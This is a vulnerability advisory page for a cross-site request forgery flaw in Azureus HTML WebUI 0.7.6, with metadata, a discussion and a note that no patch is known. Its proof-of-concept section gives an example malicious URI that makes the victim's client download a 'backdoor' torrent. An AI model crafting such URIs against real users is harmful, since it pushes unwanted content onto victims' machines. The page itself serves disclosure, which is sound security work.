Azureus HTML WebUI Cross-Site Request Forgery Vulnerability
BID:28848
Info
Azureus HTML WebUI Cross-Site Request Forgery Vulnerability
| Bugtraq ID: | 28848 |
| Class: | Design Error |
| CVE: |
CVE-2008-6587 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 18 2008 12:00AM |
| Updated: | May 07 2015 05:29PM |
| Credit: | th3.r00k |
| Vulnerable: |
Azureus HTML WebUI 0.7.6 |
| Not Vulnerable: | |
Discussion
Azureus HTML WebUI Cross-Site Request Forgery Vulnerability
Azureus HTML WebUI is prone to a cross-site request-forgery vulnerability.
Successful exploits aid in transferring malicious content to unsuspecting users' computers, aiding in further attacks. Other actions may also be affected, but this has not been confirmed.
Azureus HTML WebUI 0.7.6 is vulnerable; other versions may also be affected.
Azureus HTML WebUI is prone to a cross-site request-forgery vulnerability.
Successful exploits aid in transferring malicious content to unsuspecting users' computers, aiding in further attacks. Other actions may also be affected, but this has not been confirmed.
Azureus HTML WebUI 0.7.6 is vulnerable; other versions may also be affected.
Exploit / POC
Azureus HTML WebUI Cross-Site Request Forgery Vulnerability
To exploit this issue, an attacker must entice an unsuspecting victim into following a malicious URI.
The following example URI is available:
http://www.example.com:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent
To exploit this issue, an attacker must entice an unsuspecting victim into following a malicious URI.
The following example URI is available:
http://www.example.com:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent
Solution / Fix
Azureus HTML WebUI Cross-Site Request Forgery Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Azureus HTML WebUI Cross-Site Request Forgery Vulnerability
References:
References: